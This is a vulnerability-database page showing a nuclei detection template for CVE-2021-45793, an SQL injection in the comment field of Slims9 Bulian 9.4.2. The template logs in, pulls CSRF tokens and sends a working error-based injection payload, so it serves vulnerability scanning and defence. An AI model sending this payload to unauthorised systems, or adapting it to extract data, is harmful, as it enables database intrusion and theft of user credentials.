Lucene search
K

Slims9 Bulian 9.4.2 - SQL Injection

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

Slims9 Bulian 9.4.2 has high severity SQL injection vulnerability allowing user data exposure.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-45793
17 Mar 202212:15
attackerkb
Circl
CVE-2021-45793
17 Mar 202215:21
circl
CNNVD
Slims9 Bulian SQL注入漏洞
17 Mar 202200:00
cnnvd
CVE
CVE-2021-45793
17 Mar 202211:12
cve
Cvelist
CVE-2021-45793
17 Mar 202211:12
cvelist
NVD
CVE-2021-45793
17 Mar 202212:15
nvd
Prion
Sql injection
17 Mar 202212:15
prion
RedhatCVE
CVE-2021-45793
22 May 202518:55
redhatcve
id: CVE-2021-45793

info:
  name: Slims9 Bulian 9.4.2 - SQL Injection
  author: nblirwn
  severity: high
  description: |
    Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
  impact: |
    Authenticated attackers can exploit SQL injection in the comment field to extract database contents including user credentials and sensitive library data.
  remediation: |
    Upgrade to Slims9 Bulian version 9.4.3 or later.
  reference:
    - https://github.com/slims/slims9_bulian/issues/123
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45793
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45793
    cwe-id: CWE-89
    epss-score: 0.04637
    epss-percentile: 0.9062
    cpe: cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: slims
    product: senayan_library_management_system
  tags: cve2021,cve,slims,sqli,vuln

variables:
  num: "999999999"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        memberID={{username}}&memberPassWord={{password}}&_csrf_token_{{csrf_token}}={{csrf_token2}}&logMeIn=Login

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - 'name="_csrf_token_([a-f0-9]+)"'
        internal: true

      - type: regex
        name: csrf_token2
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true

  - raw:
      - |
        GET /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_token3
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true

  - raw:
      - |
        POST /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        comment=%27and%2F**%2F1%3D%28updatexml%281%2Cconcat%280x3a%2Cmd5%28{{num}}%29%29%2C1%29%29%2F**%2Fand%2F**%2F%271%27%3D%271&SaveComment=Save+comment&_csrf_token_{{csrf_token}}={{csrf_token3}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fd"

      - type: status
        status:
          - 200
# digest: 490a0046304402205848d150533296067b6ef53be82693e4fd5fad6c649184215d0bfddf2f8917df0220009d0e498aaf2d907d606447181ab95b89a7426899560c781dd9ef312a532c0b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.04637
45